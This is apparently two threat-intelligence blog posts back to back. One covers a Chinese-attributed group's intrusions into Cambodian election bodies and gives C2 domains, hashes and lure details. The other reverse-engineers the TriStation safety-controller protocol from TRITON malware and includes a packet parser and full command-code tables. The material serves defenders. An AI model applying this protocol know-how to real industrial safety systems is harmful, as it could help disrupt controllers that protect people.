FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run-up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human rights protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academia, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to businesses worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious) | AIRBREAK Downloader | AIRBREAK C2

en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html | TOP_NEWS_Japan_to_Support_the_Election.js (3c51c89078139337c2c92e084bb0904c) [Figure 4] | chemscalere[.]com

iric.gov.kh/LICADHO/Interview-Questions.pdf | [pdf]Interview-Questions.pdf.js (e413b45a04bf5f812912772f4a14650f) |

iric.gov.kh/LICADHO/Interview-Questions.pdf | [docx]Interview-Questions.docx.js (cf027a4829c9364d40dcab3f14c1f6b7) |

unknown | Interview_Questions.docx.js (c8fdd2b2ddec970fa69272fdf5ee86cc) | scsnewstoday[.]com

atimes.com/article/philippines-draws-three-hard-new-lines-on-china/ | Philippines-draws-three-hard-new-lines-on-china .js (5d6ad552f1d1b5cfe99ddb0e2bb51fd7) | mlcdailynews[.]com

facebook.com/CNR.Movement/videos/190313618267633/ | CNR.Movement.mp4.js (217d40ccd91160c152e5fce0143b16ef) | partyforumseasia[.]com

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

Copied Article Topic | Article Source (Not Compromised)

Leaders confident yet nervous | Khmer Times
Mahathir_ 'We want to be friendly with China |
PM urges voters to support CPP for peace |
CPP determined to maintain Kingdom's peace and development |
Bun Chhay's wife dies at 60 |
Crackdown planned on boycott callers |
Further floods coming to Kingdom |
Kem Sokha again denied bail |
PM vows to stay on as premier to quash traitors |
Iran_ Don't trust Trump | Fresh News
Kim-Trump summit_ Singapore's role |
Trump's North Korea summit may bring peace declaration - but at a cost | Reuters
U.S. pushes NATO to ready more forces to deter Russian threat |
us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat |
Interior Minister Sar Kheng warns of dirty tricks | Phnom Penh Post
Another player to enter market for cashless pay |
Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America | ABC News
China-funded national road inaugurated in Cambodia | The Cambodia Daily
Kim and Trump in first summit session in Singapore | Asia Times
U.S. to suspend military exercises with South Korea, Trump says | U.S. News
Rainsy defamed the King_ Hun Sen | BREAKING NEWS
cambodia-opposition-leader-denied-bail-again-in-treason-case | Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

EVILTECH (Backdoor)

  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.

DADBOD (Credential Theft)

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses, 112.66.188.28, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that, in all cases, the computers used to log in are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised: the goal may have been simply to gather intelligence, or the compromise may be part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies and to answer these types of questions, so we started with a deeper look at TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but it is natively implemented through the TriStation 1131 software suite. TriStation operates over UDP port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In TsLow.pyc’s print_last_error function we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece of the script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend
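
Pulling the pieces above together, the following minimal Python sketch parses a TriStation UDP payload using only what the TRITON scripts themselves reveal: a little-endian two-byte message type and two-byte size at offset 0, a trailing CRC-16, and, for Execution Commands, the one-byte function code at offset 6. The message-type names come from TS_cnames.pyc; the function and variable names and the synthetic example packet are our own.

import struct

# Message-type names taken from the TS_cnames.pyc dictionary (see Appendix A).
MESSAGE_TYPES = {
    1: "Connection Request",
    2: "Connection Response",
    3: "Disconnect Request",
    4: "Disconnect Response",
    5: "Execution Command",
    6: "Ping Command",
    7: "Connection Limit Reached",
    8: "Not Connected",
    9: "MPS Are Dead",
    10: "Access Denied",
    11: "Connection Failed",
}

def parse_tristation(packet: bytes) -> dict:
    """Break a raw TriStation UDP payload into the fields TRITON itself parses."""
    msg_type, size = struct.unpack("<HH", packet[0:4])   # mirrors tcm_result's '<HH' unpack
    parsed = {
        "type": msg_type,
        "type_name": MESSAGE_TYPES.get(msg_type, "unknown"),
        "size": size,
        "body": packet[4:-2],   # bytes 4:-2, exactly what tcm_result returns
        "crc": packet[-2:],     # trailing two checksum bytes (CRC-16)
    }
    if msg_type == 5 and len(packet) > 6:
        # Execution Command: the function code is the single byte at offset 6;
        # per the TRITON scripts, values over 100 are likely command replies.
        code = packet[6]
        parsed["function_code"] = code
        parsed["is_reply"] = code > 100
    return parsed

# Example: a synthetic "Ping Command" shaped packet (contents are illustrative only).
print(parse_tristation(b"\x06\x00\x04\x00" + b"\x00\x00"))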

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this were the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from a government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer clearly uses much of the right vernacular and the correct acronyms, and shows a working knowledge of PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name: tr1com40.dll
MD5: 069247DF527A96A0E048732CA57E7D3D
Size: 110592
Compile Date: 2006-08-23
File Description: Tricon Communications Interface
Product Name: TricCom Dynamic Link Library
File Version: 4.2.441
Original File Name: TricCom.DLL
Copyright: Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc is present in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". We even see misspelled command strings verbatim, such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname | Compile Date | Reference CPP Strings Code

Lagcom40.dll | 2004/11/19 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Tr1com40.dll | 2006/08/23 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Tridcom.dll | 2008/07/23 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Triccom.dll | 2008/07/23 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Tridcom.dll | 2010/09/29 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Tr1com.dll | 2011/04/27 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4
Lagcom.dll | 2011/04/27 | $Workfile: LAGSTRS.CPP $ $Modtime: Jul 21 1999 17:17:26 $ $Revision: 1.0
Triccom.dll | 2011/04/27 | $Workfile: TR1STRS.CPP $ $Modtime: May 16 2006 09:55:20 $ $Revision: 1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc) | Tr1com40.dll (2006 CPP)

Go to DOWNLOAD mode | <200>
Not set | <209>
Unk75 | Bad message from module
Unk76 | Bad message type
Unk77 | Bad TMI version number
Unk78 | Module did not respond
Unk79 | Open Connection: Invalid SAP %d
Unk81 | Unsupported message for this TMI version
Unk83 |
Wrong command |

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.
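
For anyone who wants to reproduce this kind of comparison, the sketch below shows the basic methodology as a set intersection over previously extracted string tables. The input file names are placeholders; extracting the strings from the .pyc and from the DLL resources is assumed to have been done separately.

# A small sketch of the comparison above: once the string tables have been
# extracted (one string per line) into text files, the overlap is a simple
# set intersection. The file names here are placeholders.
def load_strings(path: str) -> set:
    with open(path, "r", encoding="utf-8", errors="ignore") as f:
        return {line.strip() for line in f if line.strip()}

triton_names = load_strings("ts_names.txt")          # dumped from TS_cnames.pyc
dll_strings = load_strings("tr1com40_strings.txt")   # dumped from tr1com40.dll

shared = triton_names & dll_strings
combined = triton_names | dll_strings
print(f"{len(shared)} shared of {len(combined)} combined strings")
print("Unique to TS_cnames:", sorted(triton_names - dll_strings))
print("Unique to the DLL:", sorted(dll_strings - triton_names))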

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation protocol, the threat actors still had an incomplete understanding of it. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in the TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name | MD5 | Description

Tr1com40.dll | 069247df527a96a0e048732ca57e7d3d | Tricon Communications DLL
Data1.cab | e6a3c93a6d433cbaf6f573b6c09d76c4 | Parent of Tr1com40.dll
Trilog v4.1.360R | 13a3b83ba2c4236ca59aba679941c8a5 | RAR Archive of TriLog
TridCom.dll | 5c2ed617fdec4779cb33c89082a43100 | Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward, it would be reasonable to anticipate additional frameworks, such as TRITON, designed for use against other SIS controllers and associated technologies. If Triconex was within scope for this attacker, we may see similar attacker methodologies applied against the other dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.
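
As one small example of the baseline idea, the sketch below tallies TriStation message types per source host from already-captured UDP/1502 payloads; how the packets are collected is left to your sensor or packet capture tooling. The host addresses and packet bytes in the example are illustrative only.

from collections import Counter, defaultdict

# A sketch of the baseline idea: given (source_ip, udp_payload) pairs captured
# from TriStation traffic on UDP/1502, tally message types per source host so
# that deviations from the normal mix stand out.
def baseline_message_types(packets):
    per_host = defaultdict(Counter)
    for src_ip, payload in packets:
        if len(payload) >= 2:
            msg_type = payload[0] | (payload[1] << 8)  # little-endian type at offset 0
            per_host[src_ip][msg_type] += 1
    return per_host

# Illustrative input only: a workstation sending a Ping Command (6) and an
# unexpected host issuing an Execution Command (5), which would merit a closer look.
example = [("10.0.0.5", b"\x06\x00\x00\x00"), ("10.0.0.99", b"\x05\x00\x10\x00")]
for host, counts in baseline_message_types(example).items():
    print(host, dict(counts))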

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most ICS attacks involve standard IT intrusions, we should come together to develop and improve guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about TriStation here on the blog, our work will continue as we study the protocol further.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.


Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0 | Message Type

1 | Connection Request
2 | Connection Response
3 | Disconnect Request
4 | Disconnect Response
5 | Execution Command
6 | Ping Command
7 | Connection Limit Reached
8 | Not Connected
9 | MPS Are Dead
10 | Access Denied
11 | Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6

TS_cnames String

0

0: 'Start download all',

1

1: 'Start download change',

2

2: 'Update configuration',

3

3: 'Upload configuration',

4

4: 'Set I/O addresses',

5

5: 'Allocate network',

6

6: 'Load vector table',

7

7: 'Set calendar',

8

8: 'Get calendar',

9

9: 'Set scan time',

A

10: 'End download all',

B

11: 'End download change',

C

12: 'Cancel download change',

D

13: 'Attach TRICON',

E

14: 'Set I/O address limits',

F

15: 'Configure module',

10

16: 'Set multiple point values',

11

17: 'Enable all points',

12

18: 'Upload vector table',

13

19: 'Get CP status ',

14

20: 'Run program',

15

21: 'Halt program',

16

22: 'Pause program',

17

23: 'Do single scan',

18

24: 'Get chassis status',

19

25: 'Get minimum scan time',

1A

26: 'Set node number',

1B

27: 'Set I/O point values',

1C

28: 'Get I/O point values',

1D

29: 'Get MP status',

1E

30: 'Set retentive values',

1F

31: 'Adjust clock calendar',

20

32: 'Clear module alarms',

21

33: 'Get event log',

22

34: 'Set SOE block',

23

35: 'Record event log',

24

36: 'Get SOE data',

25

37: 'Enable OVD',

26

38: 'Disable OVD',

27

39: 'Enable all OVDs',

28

40: 'Disable all OVDs',

29

41: 'Process MODBUS',

2A

42: 'Upload network',

2B

43: 'Set lable',

2C

44: 'Configure system variables',

2D

45: 'Deconfigure module',

2E

46: 'Get system variables',

2F

47: 'Get module types',

30

48: 'Begin conversion table download',

31

49: 'Continue conversion table download',

32

50: 'End conversion table download',

33

51: 'Get conversion table',

34

52: 'Set ICM status',

35

53: 'Broadcast SOE data available',

36

54: 'Get module versions',

37

55: 'Allocate program',

38

56: 'Allocate function',

39

57: 'Clear retentives',

3A

58: 'Set initial values',

3B

59: 'Start TS2 program download',

3C

60: 'Set TS2 data area',

3D

61: 'Get TS2 data',

3E

62: 'Set TS2 data',

3F

63: 'Set program information',

40

64: 'Get program information',

41

65: 'Upload program',

42

66: 'Upload function',

43

67: 'Get point groups',

44

68: 'Allocate symbol table',

45

69: 'Get I/O address',

46

70: 'Resend I/O address',

47

71: 'Get program timing',

48

72: 'Allocate multiple functions',

49

73: 'Get node number',

4A

74: 'Get symbol table',

4B

75: 'Unk75',

4C

76: 'Unk76',

4D

77: 'Unk77',

4E

78: 'Unk78',

4F

79: 'Unk79',

50

80: 'Go to DOWNLOAD mode',

51

81: 'Unk81',

52

 

53

83: 'Unk83',

54

 

55

 

56

 

57

 

58

 

59

 

5A

 

5B

 

5C

 

5D

 

5E

 

5F

 

60

 

61

 

62

 

63

 

64

100: 'Command rejected',

65

101: 'Download all permitted',

66

102: 'Download change permitted',

67

103: 'Modification accepted',

68

104: 'Download cancelled',

69

105: 'Program accepted',

6A

106: 'TRICON attached',

6B

107: 'I/O addresses set',

6C

108: 'Get CP status response',

6D

109: 'Program is running',

6E

110: 'Program is halted',

6F

111: 'Program is paused',

70

112: 'End of single scan',

71

113: 'Get chassis configuration response',

72

114: 'Scan period modified',

73

115: '<115>',

74

116: '<116>',

75

117: 'Module configured',

76

118: '<118>',

77

119: 'Get chassis status response',

78

120: 'Vectors response',

79

121: 'Get I/O point values response',

7A

122: 'Calendar changed',

7B

123: 'Configuration updated',

7C

124: 'Get minimum scan time response',

7D

125: '<125>',

7E

126: 'Node number set',

7F

127: 'Get MP status response',

80

128: 'Retentive values set',

81

129: 'SOE block set',

82

130: 'Module alarms cleared',

83

131: 'Get event log response',

84

132: 'Symbol table ccepted',

85

133: 'OVD enable accepted',

86

134: 'OVD disable accepted',

87

135: 'Record event log response',

88

136: 'Upload network response',

89

